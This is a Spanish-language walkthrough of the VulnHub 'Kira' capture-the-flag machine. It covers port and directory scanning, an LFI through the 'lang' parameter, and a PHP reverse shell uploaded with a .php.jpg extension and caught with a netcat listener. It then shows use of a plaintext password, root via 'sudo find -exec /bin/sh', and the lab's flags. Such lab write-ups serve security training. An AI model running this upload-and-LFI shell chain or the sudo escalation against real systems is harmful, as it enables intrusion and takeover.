[VULNHUB] KiraCTF

Hoy vamos a hackear la maquina de Vulnhub llamada Kira. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/kira-ctf,594/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    > nmap -A -p- 192.168.1.24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-13 13:09 CET Nmap scan report for bassam-aziz.home (192.168.1.24) Host is up (0.0025s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
    Vemos que solo tiene el puerto 80 abierto, asi que lo miramos mas en detalle con la ayuda de gobuster.
    > gobuster dir -u http://192.168.1.24/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.tx t =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.24/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.tx t [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/13 13:28:41 Starting gobuster =============================================================== /uploads (Status: 301) /server-status (Status: 403) =============================================================== 2020/11/13 13:31:26 Finished ===============================================================
    Encontramos el directorio "uploads". Si entramos en el directorio http://192.168.1.24/uploads, podemos ver que hay 2 botones. El primer boton nos permite subir una imagen y el segundo boton, nos lleva a una pagina con titulo LFI, y que podemos explotar dicho LFI a traves del parametro "lang".
    http://192.168.1.24/language.php?lang=../../../etc/passwd.
    Viendo esto, lo que haremos sera subir una reverse shell en php, y a traves del LFI la ejecutaremos. Preparamos nuestra reverse shell.
    cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
    La editamos para configurar nuestra IP y puerto...
    nano shell.php.jpg
    Daros cuenta que para hacer el bypass de la imagen, en este caso es tan simple como renombrar a nuestra shell.php como shell.php.jpg. Una vez echo los pasos anteriores subimos el fichero shell.php.jpg. Ponemos nc a la escucha.
    > nc -nlvp 1234
    Y visitamos:
    http://192.168.1.24/language.php?lang=../../../var/www/html/uploads/shell.php.jpg
  • Low Shell
  • Obtenemos nuestra shell :D
    > nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.102] from (UNKNOWN) [192.168.1.24] 42010 Linux bassam-aziz 5.3.0-28-generic #30~18.04.1-Ubuntu SMP Fri Jan 17 06:14:09 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 13:04:21 up 34 min, 1 user, load average: 1.02, 1.02, 0.98 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bassam :0 :0 12:30 ?xdm? 33:07 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
    Exploramos el sistema para ver si encontramos algo.
    $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@bassam-aziz:/var/www/html$ ls -la total 28 drwxr-xr-x 4 root root 4096 ما� 26 2020 . drwxr-xr-x 3 root root 4096 ما� 26 2020 .. -rw-r--r-- 1 root root 163 ما� 26 2020 index.html -rw-r--r-- 1 root root 287 ما� 26 2020 language.php drwxr-xr-x 2 root root 4096 نو� 4 10:52 supersecret-for-aziz -rw-r--r-- 1 root root 747 ما� 26 2020 upload.php drwxrwxrwx 2 root root 4096 نو� 14 12:43 uploads www-data@bassam-aziz:/var/www/html$ cd supersecret-for-aziz www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ ls -la ls -la total 12 drwxr-xr-x 2 root root 4096 نو� 4 10:52 . drwxr-xr-x 4 root root 4096 ما� 26 2020 .. -rw-r--r-- 1 root root 15 نو� 4 10:52 bassam-pass.txt www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ cat bassam-pass.txt Password123!@#
    Parece que encontramos el password del usuario bassam, nos logueamos!
    www-data@bassam-aziz:/var/www/html/supersecret-for-aziz$ su bassam su bassam Password: Password123!@#
  • user.txt
  • bassam@bassam-aziz:~$ cat user.txt THM{Bassam-Is-Better_Than-KIRA}
  • Privilege Escalation
  • Miramos si podemos hacer algo con sudo.
    bassam@bassam-aziz:~$ sudo -l [sudo] password for bassam: Password123!@# Matching Defaults entries for bassam on bassam-aziz: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User bassam may run the following commands on bassam-aziz: (ALL : ALL) /usr/bin/find
    Vemos que podemos usar find, asi que lo utilizamos para obtener nuestra shell privilegiada!
    bassam@bassam-aziz:~$ sudo find . -exec /bin/sh \; -quit # cd /root # ls flag.txt # cat flag.txt THM{root-Is_Better-Than_All-of-THEM-31337}
  • End
  • Y con esto ya seriamos root de la maquina.